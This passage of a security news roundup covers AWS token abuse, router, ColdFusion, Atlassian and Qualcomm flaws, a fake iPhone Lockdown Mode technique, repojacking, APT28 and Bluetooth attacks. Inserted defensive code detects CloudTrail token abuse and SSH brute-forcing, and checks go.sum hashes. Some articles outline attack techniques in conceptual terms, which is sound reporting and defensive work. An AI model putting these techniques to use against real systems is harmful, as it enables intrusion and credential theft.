In the next stage, an MFA-authenticated STS token is used to create multiple new short-term tokens, followed by conducting post-exploitation actions such as data exfiltration.

To mitigate such AWS token abuse, it's recommended to log CloudTrail event data, detect role-chaining events and MFA abuse, and rotate long-term IAM user access keys.
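A detection pass over constructed CloudTrail events for the patterns the mitigation above names: role chaining, persistence actions performed from a temporary session, and a burst of short-term tokens minted from one long-term key, each traced back to the AKIA key an analyst should rotate. This is an added example, not Red Canary's or AWS's code; the account id, key ids and role names are placeholders, and the field names follow the CloudTrail record format.

```python
"""Flag STS-token abuse patterns in CloudTrail records.

Added example, not Red Canary's or AWS's code. Field names follow the CloudTrail
record format; the events, account id and key ids are constructed placeholders.
"""
from datetime import datetime, timedelta

# Constructed sample: a long-term key mints a session token, the session
# assumes a role, that role chains into a second role, and the chained
# session creates a new long-term access key for persistence.
SAMPLE_EVENTS = [
    {"eventTime": "2023-12-05T10:00:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetSessionToken",
     "userIdentity": {"type": "IAMUser", "accessKeyId": "AKIAEXAMPLE0000000001"},
     "responseElements": {"credentials": {"accessKeyId": "ASIAEXAMPLE0000000011"}}},
    {"eventTime": "2023-12-05T10:01:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "AssumeRole",
     "userIdentity": {"type": "IAMUser", "accessKeyId": "ASIAEXAMPLE0000000011"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/Reader"},
     "responseElements": {"credentials": {"accessKeyId": "ASIAEXAMPLE0000000012"}}},
    {"eventTime": "2023-12-05T10:02:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "AssumeRole",
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLE0000000012",
                      "arn": "arn:aws:sts::123456789012:assumed-role/Reader/s1"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/Admin"},
     "responseElements": {"credentials": {"accessKeyId": "ASIAEXAMPLE0000000013"}}},
    {"eventTime": "2023-12-05T10:03:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey",
     "userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLE0000000013",
                      "arn": "arn:aws:sts::123456789012:assumed-role/Admin/s2"},
     "requestParameters": {"userName": "backup-svc"}},
]

# IAM calls that hand an intruder durable access once a session expires.
PERSISTENCE_APIS = {"CreateAccessKey", "CreateUser", "CreateLoginProfile",
                    "AttachUserPolicy", "PutUserPolicy"}

def key_lineage(events):
    """Map each temporary key STS issued to the key that requested it."""
    parent = {}
    for ev in events:
        if ev.get("eventSource") != "sts.amazonaws.com":
            continue
        creds = (ev.get("responseElements") or {}).get("credentials") or {}
        child, caller = creds.get("accessKeyId"), ev["userIdentity"].get("accessKeyId")
        if child and caller:
            parent[child] = caller
    return parent

def root_key(key, parent):
    """Walk an ASIA key back to the long-term AKIA key that started the chain."""
    seen = set()
    while key in parent and key not in seen:
        seen.add(key)
        key = parent[key]
    return key

def detect_role_chaining(events):
    """AssumeRole issued by a session that is itself an assumed role."""
    return [ev for ev in events if ev.get("eventName") == "AssumeRole"
            and ev["userIdentity"].get("type") == "AssumedRole"]

def detect_session_persistence(events):
    """Persistence APIs invoked with temporary (ASIA) credentials."""
    return [ev for ev in events if ev.get("eventName") in PERSISTENCE_APIS
            and ev["userIdentity"].get("accessKeyId", "").startswith("ASIA")]

def detect_token_burst(events, parent, max_tokens=2, window=timedelta(minutes=10)):
    """Root keys whose chain minted more than max_tokens STS credentials in window."""
    minted = {}
    for ev in events:
        if ev.get("eventSource") == "sts.amazonaws.com" and ev.get("responseElements"):
            root = root_key(ev["userIdentity"]["accessKeyId"], parent)
            minted.setdefault(root, []).append(
                datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ"))
    bursts = {}
    for key, times in minted.items():
        times.sort()
        lo = 0  # sliding window over sorted mint times
        for hi in range(len(times)):
            while times[hi] - times[lo] > window:
                lo += 1
            if hi - lo + 1 > max_tokens:
                bursts[key] = max(bursts.get(key, 0), hi - lo + 1)
    return bursts

def analyze(events):
    """Return findings; each names the long-term key an analyst should rotate."""
    parent = key_lineage(events)
    findings = []
    for ev in detect_role_chaining(events):
        findings.append({"rule": "role_chaining", "time": ev["eventTime"],
                         "target_role": ev["requestParameters"]["roleArn"],
                         "rotate": root_key(ev["userIdentity"]["accessKeyId"], parent)})
    for ev in detect_session_persistence(events):
        findings.append({"rule": "persistence_via_session", "api": ev["eventName"],
                         "rotate": root_key(ev["userIdentity"]["accessKeyId"], parent)})
    for key, n in detect_token_burst(events, parent).items():
        findings.append({"rule": "token_burst", "tokens": n, "rotate": key})
    return findings
```

Against a real CloudTrail export, feed the `Records` array of each log file to `analyze()`; the `rotate` field of every finding is the static key whose revocation invalidates the whole chain of temporary tokens derived from it.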

"AWS STS is a critical security control for limiting the use of static credentials and the duration of access for users across their cloud infrastructure," the researchers said.

"However, under certain IAM configurations that are common across many organizations, adversaries can also create and abuse these STS tokens to access cloud resources and perform malicious actions."


Sierra:21 - Flaws in Sierra Wireless Routers Expose Critical Sectors to Cyber Attacks
7.12.23  Vulnerability  The Hacker News

A collection of 21 security flaws have been discovered in Sierra Wireless AirLink cellular routers and open-source software components like TinyXML and OpenNDS.

Collectively tracked as Sierra:21, the issues expose over 86,000 devices across critical sectors like energy, healthcare, waste management, retail, emergency services, and vehicle tracking to cyber threats, according to Forescout Vedere Labs. A majority of these devices are located in the U.S., Canada, Australia, France, and Thailand.

"These vulnerabilities may allow attackers to steal credentials, take control of a router by injecting malicious code, persist on the device and use it as an initial access point into critical networks," the industrial cybersecurity company said in a new analysis.

Of the 21 vulnerabilities, one is rated critical, nine are rated high, and 11 are rated medium in severity.

This includes remote code execution (RCE), cross-site scripting (XSS), denial-of-service (DoS), unauthorized access, and authentication bypasses that could be exploited to seize control of vulnerable devices, conduct credential theft via injection of malicious JavaScript, crash the management application, and conduct adversary-in-the-middle (AitM) attacks.


These shortcomings can also be weaponized by botnet malware for worm-like automatic propagation, communication with command-and-control (C2) servers, and enslaving affected susceptible machines to launch DDoS attacks.

Fixes for the flaws have been released in ALEOS 4.17.0 (or ALEOS 4.9.9), and OpenNDS 10.1.3. TinyXML, on the other hand, is no longer actively maintained, necessitating that the problems be addressed downstream by affected vendors.

"Attackers could leverage some of the new vulnerabilities to take full control of an OT/IoT router in critical infrastructure and achieve different goals such as network disruption, espionage, lateral movement and further malware deployment," Forescout said.

"Vulnerabilities impacting critical infrastructure are like an open window for bad actors in every community. State-sponsored actors are developing custom malware to use routers for persistence and espionage. Cybercriminals are also leveraging routers and related infrastructure for residential proxies and to recruit into botnets."


Hackers Exploited ColdFusion Vulnerability to Breach Federal Agency Servers
7.12.23  Incident  The Hacker News

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a high-severity Adobe ColdFusion vulnerability by unidentified threat actors to gain initial access to government servers.

"The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution," CISA said, adding an unnamed federal agency was targeted between June and July 2023.

The shortcoming affects ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It has been addressed in versions Update 16 and Update 6, released on March 14, 2023, respectively.

It was added by CISA to the Known Exploited Vulnerabilities (KEV) catalog a day later, citing evidence of active exploitation in the wild. Adobe, in an advisory released around that time, said it's aware of the flaw being "exploited in the wild in very limited attacks."

The agency noted that at least two public-facing servers were compromised using the flaw, both of which were running outdated versions of the software.

"Additionally, various commands were initiated by the threat actors on the compromised web servers; the exploited vulnerability allowed the threat actors to drop malware using HTTP POST commands to the directory path associated with ColdFusion," CISA noted.

There is evidence to suggest that the malicious activity is a reconnaissance effort carried out to map the broader network, although no lateral movement or data exfiltration has been observed.

In one of the incidents, the adversary was observed traversing the filesystem and uploading various artifacts to the web server, including binaries that are capable of exporting web browser cookies as well as malware designed to decrypt passwords for ColdFusion data sources.

A second event recorded in early June 2023 entailed the deployment of a remote access trojan that's a modified version of the ByPassGodzilla web shell and "utilizes a JavaScript loader to infect the device and requires communication with the actor-controlled server to perform actions."

Also undertaken by the adversary were attempts to exfiltrate the Windows Registry files as well as unsuccessfully download data from a command-and-control (C2) server.

"During this incident, analysis strongly suggests that the threat actors likely viewed the data contained in the ColdFusion seed.properties file via the web shell interface," CISA said.

"The seed.properties file contains the seed value and encryption method used to encrypt passwords. The seed values can also be used to decrypt passwords. No malicious code was found on the victim system to indicate the threat actors attempted to decode any passwords using the values found in seed.properties file."


Atlassian Releases Critical Software Fixes to Prevent Remote Code Execution
7.12.23  Vulnerability  The Hacker News

Atlassian has released software fixes to address four critical flaws in its software that, if successfully exploited, could result in remote code execution.

The list of vulnerabilities is below -

CVE-2022-1471 (CVSS score: 9.8) - Deserialization vulnerability in SnakeYAML library that can lead to remote code execution in multiple products
CVE-2023-22522 (CVSS score: 9.0) - Remote code execution vulnerability in Confluence Data Center and Confluence Server (affects all versions including and after 4.0.0)
CVE-2023-22523 (CVSS score: 9.8) - Remote code execution vulnerability in Assets Discovery for Jira Service Management Cloud, Server, and Data Center (affects all versions up to but not including 3.2.0-cloud / 6.2.0 data center and server)
CVE-2023-22524 (CVSS score: 9.6) - Remote code execution vulnerability in Atlassian Companion app for macOS (affects all versions up to but not including 2.0.0)

Atlassian described CVE-2023-22522 as a template injection flaw that allows an authenticated attacker, including one with anonymous access, to inject unsafe user input into a Confluence page, resulting in code execution.

The Assets Discovery flaw allows an attacker to perform privileged remote code execution on machines with the Assets Discovery agent installed, whereas CVE-2023-22524 could permit an attacker to achieve code execution by utilizing WebSockets to bypass Atlassian Companion's blocklist and macOS Gatekeeper protections.

The advisory comes nearly a month after the Australian software company revealed all versions of its Bamboo Data Center and Server products are impacted by an actively exploited critical security flaw in Apache ActiveMQ (CVE-2023-46604, CVSS score: 10.0). Fixes have been released in versions 9.2.7, 9.3.5, and 9.4.1 or later.

With Atlassian products becoming lucrative attack vectors in recent years, it's highly recommended that users move quickly to update affected installations to a patched version.


Qualcomm Releases Details on Chip Vulnerabilities Exploited in Targeted Attacks
6.12.23  Vulnerability  The Hacker News

Chipmaker Qualcomm has released more information about three high-severity security flaws that it said came under "limited, targeted exploitation" back in October 2023.

The vulnerabilities are as follows -

CVE-2023-33063 (CVSS score: 7.8) - Memory corruption in DSP Services during a remote call from HLOS to DSP.
CVE-2023-33106 (CVSS score: 8.4) - Memory corruption in Graphics while submitting a large list of sync points in an AUX command to the IOCTL_KGSL_GPU_AUX_COMMAND.
CVE-2023-33107 (CVSS score: 8.4) - Memory corruption in Graphics Linux while assigning shared virtual memory region during IOCTL call.

Google's Threat Analysis Group and Google Project Zero revealed back in October 2023 that the three flaws, along with CVE-2022-22071 (CVSS score: 8.4), have been exploited in the wild as part of limited, targeted attacks.

A security researcher named luckyrb, the Google Android Security team, and TAG researcher Benoît Sevens and Jann Horn of Google Project Zero have been credited with reporting the security vulnerabilities, respectively.

It's currently not known how these shortcomings have been weaponized, or who is behind the attacks.

The development, however, has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the four bugs to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the patches by December 26, 2023.

It also follows Google's announcement that the December 2023 security updates for Android address 85 flaws, including a critical issue in the System component tracked as CVE-2023-40088 that "could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed" and without any user interaction.


Warning for iPhone Users: Experts Warn of Sneaky Fake Lockdown Mode Attack
6.12.23  OS  The Hacker News

A new "post-exploitation tampering technique" can be abused by malicious actors to visually deceive a target into believing that their Apple iPhone is running in Lockdown Mode when it's actually not and carry out covert attacks.

The novel method, detailed by Jamf Threat Labs in a report shared with The Hacker News, "shows that if a hacker has already infiltrated your device, they can cause Lockdown Mode to be 'bypassed' when you trigger its activation."

In other words, the goal is to implement Fake Lockdown Mode on a device that's compromised by an attacker through other means, such as unpatched security flaws that can trigger execution of arbitrary code.

Lockdown Mode, introduced by Apple last year with iOS 16, is an enhanced security measure that aims to safeguard high-risk individuals from sophisticated digital threats such as mercenary spyware by minimizing the attack surface.

What it doesn't do is prevent the execution of malicious payloads on a compromised device, thereby allowing a trojan deployed on it to manipulate Lockdown Mode and give users an illusion of security.

"In the case of an infected phone, there are no safeguards in place to stop the malware from running in the background, whether the user activates Lockdown Mode or not," security researchers Hu Ke and Nir Avraham said.


The fake Lockdown Mode is accomplished by hooking functions – e.g., setLockdownModeGloballyEnabled, lockdownModeEnabled, and isLockdownModeEnabledForSafari – that are triggered upon activating the setting so as to create a file called "/fakelockdownmode_on" and initiate a userspace reboot, which terminates all processes and restarts the system without touching the kernel.

This also means that a piece of malware implanted on the device sans any persistence mechanism will continue to exist even after a reboot of this kind and surreptitiously spy on its users.

What's more, an adversary could alter the Lockdown Mode on the Safari web browser to make it possible to view PDF files, which are otherwise blocked when the setting is turned on.

"Since iOS 17, Apple has elevated Lockdown Mode to kernel level," the researchers said. "This strategic move is a great step in enhancing security, as changes made by Lockdown Mode in the kernel typically cannot be undone without undergoing a system reboot, thanks to existing security mitigations."

The disclosure from Jamf arrives nearly four months after it demonstrated another novel method on iOS 16 that could be abused to fly under the radar and maintain access to an Apple device by tricking the victim into thinking their device's Airplane Mode is enabled.


Russia's AI-Powered Disinformation Operation Targeting Ukraine, U.S., and Germany
6.12.23  BigBrothers  The Hacker News

The Russia-linked influence operation called Doppelganger has targeted Ukrainian, U.S., and German audiences through a combination of inauthentic news sites and social media accounts.

These campaigns amplify content designed to undermine Ukraine, as well as content that propagates anti-LGBTQ+ sentiment and narratives about U.S. military competence and Germany's economic and social issues, according to a new report shared with The Hacker News.

Doppelganger, described by Meta as the "largest and the most aggressively-persistent Russian-origin operation," is a pro-Russian network known for spreading anti-Ukrainian propaganda. Active since at least February 2022, it has been linked to two companies named Structura National Technologies and Social Design Agency.

Activities associated with the influence operation are known to leverage manufactured websites as well as those impersonating authentic media – a technique called brandjacking – to disseminate adversarial narratives.

The latest campaigns are also characterized by the use of advanced obfuscation techniques, including "manipulating social media thumbnails and strategic first and second-stage website redirects to evade detection, and the likely use of generative artificial intelligence (AI) to create inauthentic news articles," the cybersecurity firm said.

The findings demonstrate Doppelgänger's evolving tactics and throw light on the use of AI for information warfare and to produce scalable influence content.

The campaign targeting Ukraine is said to consist of more than 800 social media accounts, in addition to banking on first and second-stage domains to conceal the true destination. Some of these links also use the Keitaro Traffic Distribution System (TDS) to assess the overall success and effectiveness of the campaign.


One of the notable aspects of the U.S. and German campaigns is the use of inauthentic media outlets such as Election Watch, MyPride, Warfare Insider, Besuchszweck, Grenzezank, and Haüyne Scherben that publish malign content as original news and opinion outlets.

"Doppelgänger exemplifies the enduring, scalable, and adaptable nature of Russian information warfare, demonstrating strategic patience aimed at gradually shifting public opinion and behavior," Recorded Future said.

It's worth pointing out that Meta, in its quarterly Adversarial Threat Report published last week, said it also found a new cluster of websites linked to Doppelganger that are geared towards U.S. and European political affairs, such as migration and border security.

"Their latest web content appears to have been copy-pasted from mainstream U.S. news outlets and altered to question U.S. democracy and promote conspiratorial themes," Meta said, highlighting Election Watch as one of the U.S.-focused sites.

"Soon after the Hamas terrorist attack in Israel [in October 2023], we saw these websites begin posting about the crisis in the Middle East as a proof of American decline; and at least one website claimed Ukraine supplied Hamas with weapons."

Meta also said it took steps to disrupt three separate covert influence operations – two from China and one from Russia – during the third quarter of 2023 that leveraged fictitious personas and media brands to target audiences in India and the U.S., and share content about Russia's invasion of Ukraine.

It, however, noted that proactive threat sharing by the federal government in the U.S. related to foreign election interference has been paused since July 2023, cutting off a key source of information that could be valuable to disrupt malicious foreign campaigns by sophisticated threat actors.


15,000 Go Module Repositories on GitHub Vulnerable to Repojacking Attack
6.12.23  Attack  The Hacker News

New research has found that over 15,000 Go module repositories on GitHub are vulnerable to an attack called repojacking.

"More than 9,000 repositories are vulnerable to repojacking due to GitHub username changes," Jacob Baines, chief technology officer at VulnCheck, said in a report shared with The Hacker News. "More than 6,000 repositories were vulnerable to repojacking due to account deletion."

Collectively, these repositories account for no less than 800,000 Go module-versions.

Repojacking, a portmanteau of "repository" and "hijacking," is an attack technique that allows a bad actor to take advantage of account username changes and deletions to create a repository with the same name and the pre-existing username to stage open-source software supply chain attacks.

Earlier this June, cloud security firm Aqua revealed that millions of software repositories on GitHub are likely vulnerable to the threat, urging organizations that undergo name changes to ensure that they still own their previous name as placeholders to prevent such abuse.

Modules written in the Go programming language are particularly susceptible to repojacking because, unlike centralized package registries such as npm or PyPI, Go's module ecosystem is decentralized: modules are published directly to version control platforms like GitHub or Bitbucket.

"Anyone can then instruct the Go module mirror and pkg.go.dev to cache the module's details," Baines said. "An attacker can register the newly unused username, duplicate the module repository, and publish a new module to proxy.golang.org and go.pkg.dev."

To prevent developers from pulling down potentially unsafe packages, GitHub has in place a countermeasure called popular repository namespace retirement that blocks attempts to create repositories with the names of retired namespaces that have been cloned more than 100 times prior to the owners' accounts being renamed or deleted.

But VulnCheck noted that this protection isn't helpful when it comes to Go modules as they are cached by the module mirror, thereby obviating the need for interacting with or cloning a repository. In other words, there could be popular Go-based modules that have been cloned less than 100 times, resulting in a bypass of sorts.
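To make concrete what the module mirror's caching does and does not protect, here is an added example, not VulnCheck's or the Go project's code, that reimplements in plain Go the "h1:" hash that go.sum records per module version, following the Hash1 algorithm of golang.org/x/mod/sumdb/dirhash (each file is SHA-256 hashed, the sorted summary lines are hashed again, and the result is base64-encoded). The module path github.com/old-owner/util and the file contents are constructed for the illustration. A build that verifies go.sum rejects a version whose content differs from what was first recorded, which is what happens if a repository is re-created under a reclaimed username and the same tag is republished with different content; a new tag pushed to the hijacked repository has no go.sum entry yet, so pinning does not cover it, which is the residual risk the report describes.

```go
package main

import (
	"crypto/sha256"
	"encoding/base64"
	"fmt"
	"sort"
)

// ModuleHash1 computes the "h1:" hash that go.sum records for a module
// version. It follows the Hash1 algorithm of golang.org/x/mod/sumdb/dirhash:
// each file is SHA-256 hashed, the lines "<hex>  <module>@<version>/<path>\n"
// are emitted in sorted path order, and the SHA-256 of that summary is
// base64-encoded. Files are given as path -> content (constructed inputs).
func ModuleHash1(modulePath, version string, files map[string][]byte) string {
	prefix := modulePath + "@" + version + "/"
	names := make([]string, 0, len(files))
	for name := range files {
		names = append(names, prefix+name)
	}
	sort.Strings(names)
	summary := sha256.New()
	for _, name := range names {
		sum := sha256.Sum256(files[name[len(prefix):]])
		fmt.Fprintf(summary, "%x  %s\n", sum, name)
	}
	return "h1:" + base64.StdEncoding.EncodeToString(summary.Sum(nil))
}

// GoSumEntry formats a line as it would appear in go.sum.
func GoSumEntry(modulePath, version, hash string) string {
	return fmt.Sprintf("%s %s %s", modulePath, version, hash)
}

// VerifyModule reports whether freshly fetched content matches the hash
// pinned in go.sum for that module version. A mismatch means the content
// behind an already-recorded version has changed (for example because the
// repository was re-created under a hijacked username), and the build must
// stop.
func VerifyModule(pinned, modulePath, version string, files map[string][]byte) bool {
	return pinned == GoSumEntry(modulePath, version, ModuleHash1(modulePath, version, files))
}

func main() {
	// Hypothetical module path and content, constructed for this example.
	const mod, ver = "github.com/old-owner/util", "v1.0.0"
	original := map[string][]byte{
		"go.mod":  []byte("module github.com/old-owner/util\n\ngo 1.21\n"),
		"util.go": []byte("package util\n\nfunc Add(a, b int) int { return a + b }\n"),
	}
	pinned := GoSumEntry(mod, ver, ModuleHash1(mod, ver, original))
	fmt.Println("go.sum:", pinned)

	// Same tag, different content: what a republished repository would serve.
	republished := map[string][]byte{
		"go.mod":  original["go.mod"],
		"util.go": []byte("package util\n\nfunc Add(a, b int) int { return a + b } // changed\n"),
	}
	fmt.Println("original verifies:   ", VerifyModule(pinned, mod, ver, original))
	fmt.Println("republished verifies:", VerifyModule(pinned, mod, ver, republished))
}
```

The same hash is what proxy.golang.org and the checksum database sum.golang.org record when a version is first fetched, so pinning protects every version already in go.sum; it is the not-yet-pinned versions that a hijacked repository can introduce, which is why the report's advice is to know the state of the repository a module originates from.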

"Unfortunately, mitigating all of these repojackings is something that either Go or GitHub will have to take on," Baines said. "A third-party can't reasonably register 15,000 GitHub accounts. Until then, it's important for Go developers to be aware of the modules they use, and the state of the repository that the modules originated from."

The disclosure also comes as Lasso Security said it discovered 1,681 exposed API tokens on Hugging Face and GitHub, including those associated with Google, Meta, Microsoft, and VMware, that could be potentially exploited to stage supply chain, training data poisoning, and model theft attacks.


Microsoft Warns of Kremlin-Backed APT28 Exploiting Critical Outlook Vulnerability
5.12.23  APT  The Hacker News

Microsoft on Monday said it detected Kremlin-backed nation-state activity exploiting a critical security flaw in its Outlook email service to gain unauthorized access to victims' accounts within Exchange servers.

The tech giant attributed the intrusions to a threat actor it called Forest Blizzard (formerly Strontium), which is also widely tracked under the monikers APT28, BlueDelta, Fancy Bear, FROZENLAKE, Iron Twilight, Sednit, and Sofacy.

The security vulnerability in question is CVE-2023-23397 (CVSS score: 9.8), a critical privilege escalation bug that could allow an adversary to access a user's Net-NTLMv2 hash that could then be used to conduct a relay attack against another service to authenticate as the user. It was patched by Microsoft in March 2023.

The goal, according to the Polish Cyber Command (DKWOC), was to obtain unauthorized access to mailboxes belonging to public and private entities in the country.

"In the next stage of malicious activity, the adversary modifies folder permissions within the victim's mailbox," DKWOC said. "In most cases, the modifications are to change the default permissions of the 'Default' group (all authenticated users in the Exchange organization) from 'None' to 'Owner.'"

In doing so, the contents of mailbox folders that have been granted this permission can be read by any authenticated person within the organization, enabling the threat actor to extract valuable information from high-value targets.

"It should be emphasized that the introduction of such modifications allows for the maintenance of unauthorized access to the contents of the mailbox even after losing direct access to it," DKWOC added.

Microsoft previously disclosed that the security shortcoming had been weaponized by Russia-based threat actors as a zero-day in attacks targeting government, transportation, energy, and military sectors in Europe since April 2022.


Subsequently, in June 2023, cybersecurity firm Recorded Future revealed details of a spear-phishing campaign orchestrated by APT28 exploiting multiple vulnerabilities in the open-source Roundcube webmail software, while simultaneously noting that the campaign overlaps with activity employing the Microsoft Outlook vulnerability.

The National Cybersecurity Agency of France (ANSSI), in late October, also blamed the hacking outfit for targeting government entities, businesses, universities, research institutes, and think tanks since the second half of 2021 by taking advantage of various flaws, counting CVE-2023-23397, to deploy implants such as CredoMap.

The state-sponsored group is assessed to be linked to Unit 26165 of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), the foreign intelligence arm of the Ministry of Defense.

In recent months, it has also been connected to attacks on various organizations in France and Ukraine as well as the abuse of the WinRAR flaw (CVE-2023-38831) to steal browser login data using a PowerShell script named IRONJAW.

"Forest Blizzard continually refines its footprint by employing new custom techniques and malware, suggesting that it is a well-resourced and well-trained group posing long-term challenges to attribution and tracking its activities," Microsoft said.

The popularity of Microsoft Outlook in enterprise environments makes it a lucrative attack vector, making it "one of the critical 'gateways' responsible for introducing various cyber threats into organizations," according to Check Point, which laid out the various means by which the service could be abused by bad actors to deliver their exploits.

The development comes as The Guardian reported that the Sellafield nuclear waste site in the U.K. had been breached by hacking crews associated with Russia and China to deploy "sleeper malware" as far back as 2015. However, the U.K. government said it found no evidence to suggest that its networks had been "successfully attacked by state actors."


New BLUFFS Bluetooth Attack Exposes Devices to Adversary-in-the-Middle Attacks
5.12.23  Attack  The Hacker News

New research has unearthed multiple novel attacks that break Bluetooth Classic's forward secrecy and future secrecy guarantees, resulting in adversary-in-the-middle (AitM) scenarios between two already connected peers.

The issues, collectively named BLUFFS, impact Bluetooth Core Specification 4.2 through 5.4. They are tracked under the identifier CVE-2023-24023 (CVSS score: 6.8) and were responsibly disclosed in October 2022.

The attacks "enable device impersonation and machine-in-the-middle across sessions by only compromising one session key," EURECOM researcher Daniele Antonioli said in a study published late last month.

This is made possible by leveraging two new flaws in the Bluetooth standard's session key derivation mechanism that allow the derivation of the same key across sessions.

While forward secrecy in key-agreement protocols ensures that past communications are not revealed even if the private keys of a particular exchange are later obtained by a passive attacker, future secrecy (aka backward secrecy) guarantees the confidentiality of future messages should past keys be compromised.

In other words, forward secrecy protects past sessions against future compromises of keys.

The attack works by weaponizing four architectural vulnerabilities, including the aforementioned two flaws, in the specification of the Bluetooth session establishment process to derive a weak session key, and subsequently brute-force it to spoof arbitrary victims.

The AitM attacker impersonating the paired device could then negotiate a connection with the other end to establish a subsequent encryption procedure using legacy encryption.

In doing so, "an attacker in proximity may ensure that the same encryption key is used for every session while in proximity and force the lowest supported encryption key length," the Bluetooth Special Interest Group (SIG) said.

"Any conforming BR/EDR implementation is expected to be vulnerable to this attack on session key establishment, however, the impact may be limited by refusing access to host resources from a downgraded session, or by ensuring sufficient key entropy to make session key reuse of limited utility to an attacker."

Furthermore, an attacker can take advantage of the shortcomings to brute-force the encryption key in real-time, thereby enabling live injection attacks on traffic between vulnerable peers.

The success of the attack, however, presupposes that an attacking device is within wireless range of two vulnerable Bluetooth devices initiating a pairing procedure, and that the adversary can capture Bluetooth packets in plaintext and ciphertext, knows the victim's Bluetooth address, and can craft Bluetooth packets.


As mitigations, the SIG recommends that Bluetooth implementations reject service-level connections on an encrypted baseband link with key strengths below 7 octets, have devices operate in "Secure Connections Only Mode" to ensure sufficient key strength, and perform pairing via "Secure Connections" mode as opposed to the legacy mode.

The disclosure comes as ThreatLocker detailed a Bluetooth impersonation attack that can abuse the pairing mechanism to gain wireless access to Apple macOS systems via the Bluetooth connection and launch a reverse shell.


New P2PInfect Botnet MIPS Variant Targeting Routers and IoT Devices
5.12.23  BotNet  The Hacker News

Cybersecurity researchers have discovered a new variant of an emerging botnet called P2PInfect that's capable of targeting routers and IoT devices.

The latest version, per Cado Security Labs, is compiled for Microprocessor without Interlocked Pipelined Stages (MIPS) architecture, broadening its capabilities and reach.

"It's highly likely that by targeting MIPS, the P2PInfect developers intend to infect routers and IoT devices with the malware," security researcher Matt Muir said in a report shared with The Hacker News.

P2PInfect, a Rust-based malware, was first disclosed back in July 2023, targeting unpatched Redis instances by exploiting a critical Lua sandbox escape vulnerability (CVE-2022-0543, CVSS score: 10.0) for initial access.

A subsequent analysis from the cloud security firm in September revealed a surge in P2PInfect activity, coinciding with the release of iterative variants of the malware.

The new artifacts, besides attempting to conduct SSH brute-force attacks on devices embedded with 32-bit MIPS processors, pack in updated evasion and anti-analysis techniques to fly under the radar.

The brute-force attempts against SSH servers identified during the scanning phase are carried out using common username and password pairs present within the ELF binary itself.
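Because the brute-force stage uses a fixed list of username/password pairs embedded in the binary, the signature on a targeted host is a burst of failed sshd logins from one source across many different usernames. The Go program below is an added example, neither Cado's code nor anything from the malware, that runs a sliding-window detector over constructed sshd log lines (203.0.113.0/24 is documentation address space) and reports sources exceeding the threshold together with the number of distinct usernames they tried.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"time"
)

// Constructed sshd log lines in traditional syslog format; the addresses
// are from the 203.0.113.0/24 documentation range, not real sources.
var sampleLog = []string{
	"Dec  5 10:01:02 router sshd[1201]: Failed password for root from 203.0.113.7 port 51234 ssh2",
	"Dec  5 10:01:03 router sshd[1202]: Failed password for invalid user admin from 203.0.113.7 port 51240 ssh2",
	"Dec  5 10:01:03 router sshd[1203]: Failed password for invalid user pi from 203.0.113.7 port 51241 ssh2",
	"Dec  5 10:01:04 router sshd[1204]: Failed password for invalid user ubnt from 203.0.113.7 port 51242 ssh2",
	"Dec  5 10:01:05 router sshd[1205]: Failed password for root from 203.0.113.7 port 51243 ssh2",
	"Dec  5 10:15:44 router sshd[1390]: Failed password for alice from 203.0.113.9 port 40022 ssh2",
	"Dec  5 10:15:50 router sshd[1391]: Accepted password for alice from 203.0.113.9 port 40023 ssh2",
}

// failRe extracts timestamp, username and source address from a failed login.
var failRe = regexp.MustCompile(`^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+`)

type attempt struct {
	at   time.Time
	user string
}

// Alert summarises one source that exceeded the threshold.
type Alert struct {
	Source   string
	Failures int // failures inside the densest window
	Users    int // distinct usernames tried by that source overall
}

// DetectBruteForce flags sources with at least `threshold` failed logins
// inside any `window`, and counts how many distinct usernames each tried,
// which separates a wordlist of username/password pairs from one user
// mistyping a password.
func DetectBruteForce(lines []string, threshold int, window time.Duration) []Alert {
	perSrc := map[string][]attempt{}
	for _, l := range lines {
		m := failRe.FindStringSubmatch(l)
		if m == nil {
			continue
		}
		ts, err := time.Parse("Jan _2 15:04:05", m[1]) // syslog timestamps carry no year
		if err != nil {
			continue
		}
		perSrc[m[3]] = append(perSrc[m[3]], attempt{at: ts, user: m[2]})
	}
	var alerts []Alert
	for src, atts := range perSrc {
		sort.Slice(atts, func(i, j int) bool { return atts[i].at.Before(atts[j].at) })
		best, lo := 0, 0
		for hi := range atts { // two-pointer sliding window over sorted times
			for atts[hi].at.Sub(atts[lo].at) > window {
				lo++
			}
			if hi-lo+1 > best {
				best = hi - lo + 1
			}
		}
		if best < threshold {
			continue
		}
		users := map[string]struct{}{}
		for _, a := range atts {
			users[a.user] = struct{}{}
		}
		alerts = append(alerts, Alert{Source: src, Failures: best, Users: len(users)})
	}
	sort.Slice(alerts, func(i, j int) bool { return alerts[i].Source < alerts[j].Source })
	return alerts
}

func main() {
	for _, a := range DetectBruteForce(sampleLog, 5, time.Minute) {
		fmt.Printf("%s: %d failures within one minute, %d distinct usernames\n", a.Source, a.Failures, a.Users)
	}
}
```

On the constructed lines only 203.0.113.7 is reported (five failures in four seconds across four usernames, the pattern of a fixed credential list); the single failure from 203.0.113.9 followed by a success stays below the threshold.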

It's suspected that both SSH and Redis servers are propagation vectors for the MIPS variant owing to the fact that it's possible to run a Redis server on MIPS using an OpenWrt package known as redis-server.

